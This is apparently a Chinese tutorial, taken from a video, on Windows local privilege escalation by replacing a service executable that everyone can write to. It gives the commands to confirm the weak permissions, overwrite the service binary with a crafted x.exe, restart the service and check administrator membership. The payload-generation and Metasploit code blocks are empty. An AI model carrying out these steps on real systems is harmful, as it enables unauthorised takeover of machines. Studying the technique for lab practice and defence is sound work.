windows本地提权服务之可执行文件
windows本地提权服务之可执行文件
b站上的视频教程
漏洞原理是windows服务权限配置不当,任何人都可以修改服务的应用程序。将恶意代码复制到服务的应用程序末尾,重新启动该服务,即可利用漏洞。
运行powershell脚本发现漏洞
1 |
|
查看运行结果1.txt
确认漏洞
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
RW everyone
说明任何人都有读写权限。
sc qc filepermsvc
生成攻击载荷
伪造服务应用程序
1 |
|
利用漏洞
copy /y c:\Temp\x.exe “c:\Program Files\File Permissions Service\filepermservice.exe”
sc start filepermsvc
net localgroup administrators
通过msf模块
1 |
|